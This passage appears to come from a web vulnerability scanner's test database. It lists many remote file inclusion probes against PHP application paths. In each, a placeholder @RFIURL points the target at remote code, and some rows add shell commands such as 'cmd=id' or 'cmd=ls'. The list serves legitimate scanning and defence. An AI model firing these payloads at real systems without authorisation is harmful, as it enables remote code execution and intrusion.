Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004534\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.php?full_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004535\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.php?full_path_to_db=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004536\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.php?fullpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004537\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.php?incpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004538\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.php?path_to_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004539\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.php?rel_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004541\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.php?returnpath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004542\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.php?sql_language=@RFIURL?&cmd=0wn3d\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004543\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.php?xcart_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004544\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config.php?xcart_dir=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004545\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config/config_admin.php?INC=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004546\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config/config_main.php?INC=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004547\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config/config_member.php?INC=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004548\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config/dbutil.bck.php?confdir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004549\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config/mysql_config.php?INC=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004550\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/config/sender.php?ROOT_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004551\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/configuration.php?absolute_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004552\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/confirmUnsubscription.php?output=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004553\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/connect.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004554\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/connexion.php?DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004555\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/contact.php?blog_theme=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004556\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/contacts.php?cal_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004557\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/contenido/external/frontend/news.php?cfg[path][includes]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004558\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/content.php?content=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004559\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/content/admin.php?pwfile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004560\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/content/content.php?fileloc=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004561\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/content/delete.php?pwfile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004562\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/content/modify.php?pwfile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004563\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/content/modify_go.php?pwfile=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004564\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004565\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/contrib/mx_glance_sdesc.php?mx_root_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004566\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/contrib/phpBB2/modules.php?phpbb_root_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004567\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/controllers/MySQLController.php?baseDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004568\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/controllers/SQLController.php?baseDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004569\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/controllers/SetupController.php?baseDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004570\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/controllers/VideoController.php?baseDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004571\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/controllers/ViewController.php?baseDir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004572\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/convert-date.php?cal_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004573\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/convert/mvcw.php?step=1&vwar_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004574\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/convert/mvcw.php?vwar_root=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004575\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/admin/admin.php?p=admin&absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004576\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004577\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/admin/categories_add.php?absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004578\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/admin/categories_remove.php?absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004579\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004580\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/admin/editdel.php?p=admin&absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004581\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/admin/ftpfeature.php?p=admin&absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004582\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/admin/login.php?absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004583\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/admin/pgRSSnews.php?absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004584\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/admin/showcat.php?absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004585\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004586\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/archive_cat.php?absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004587\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/archive_nocat.php?absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004588\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/aural.php?site_absolute_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004589\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/aural.php?site_absolute_path=@RFIURL?&cmd=dir\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004590\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/editor.php?editor_insert_bottom=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004591\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/includes.php?CMS_ROOT=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004592\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/core/recent_list.php?absoluteurl@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004593\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/corpo.php?pagina=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004594\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cp2.php?securelib=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004595\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cp2.php?securelib=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004596\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cpe/index.php?repertoire_config=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004597\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/crea.php?plancia=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004598\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004599\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004600\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/creat_news_all.php?language=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004601\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/create_file.php?target=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004602\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cron.php?ROOT_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004603\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cron.php?include_path=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004604\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/crontab/run_billing.php?config[include_dir]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004605\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/crontab/run_billing.php?config[include_dir]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004606\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cross.php?url=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004608\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/custom_vars.php?sys[path_addon]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004609\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/customer/product.php?xcart_dir=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004610\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/cwb/comanda.php?INCLUDE_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004611\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/datei.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004612\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/db/PollDB.php?CONFIG_DATAREADERWRITER=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004613\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/db/mysql/db.inc.php?SPL_CFG[dirroot]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004614\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dbcommon/include.php?_APP_RELATIVE_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004615\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004616\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/debugger.php?config_atkroot=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004617\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/decoder/gallery.php?ccms_library_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004618\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/decoder/markdown.php?ccms_library_path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004619\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/defaults_setup.php?ROOT_PATH=@RFIURL?cmd=ls\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004620\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/defines.php?WEBCHATPATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004621\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=@RFIURL&\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004622\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/depouilg.php3?NomVote=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004623\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/development.php?root_prefix=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004624\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/development.php?root_prefix=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004625\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dfcode.php?DFORUM_PATH=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004626\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004627\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004628\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004629\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004630\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dialog.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004631\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dialogs/a.php?spaw_dir=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004632\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dialogs/collorpicker.php?spaw_dir=@RFIURL&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004633\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dialogs/img.php?spaw_dir=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004634\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dialogs/img_library.php?spaw_dir=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004635\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dialogs/table.php?spaw_dir=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004636\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dialogs/td.php?spaw_dir=@RFIURL?&cmd=id\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004637\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/digitaleye_Path/module.php?menu=@RFIURL?\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004638\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dir/prepend.php?_PX_config[manager_path]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004639\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dir_thatware/config.php?root_path=@RFIURL'\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004640\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/direct.php?rf=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004641\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/direction/index.php?repertoire_config=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004642\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/directory/index.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004643\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/display.php?pag=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004644\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/display.php?path=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004645\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/displayCategory.php?basepath=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004646\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dix.php3?url_phpartenaire=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004647\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/dm-albums/template/album.php?SECURITY_FILE=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004648\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/doc/admin/index.php?ptinclude=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004649\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/doceboCore/lib/lib.php?GLOBALS[where_framework]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004650\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004651\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004652\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004653\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI list.\",\"\",\"\"\n\"004654\",\"https://gist.github.com/mubix/5d269c686584875015a2\",\"c\",\"/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=@RFIURL\",\"GET\",\"BODY:PHP Version\",\"Remote File Inclusion (RFI) from RSnake's RFI 